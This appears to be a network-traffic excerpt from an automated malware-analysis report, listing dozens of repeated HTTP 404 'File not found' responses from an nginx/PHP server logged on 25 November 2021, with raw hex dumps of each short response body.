        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
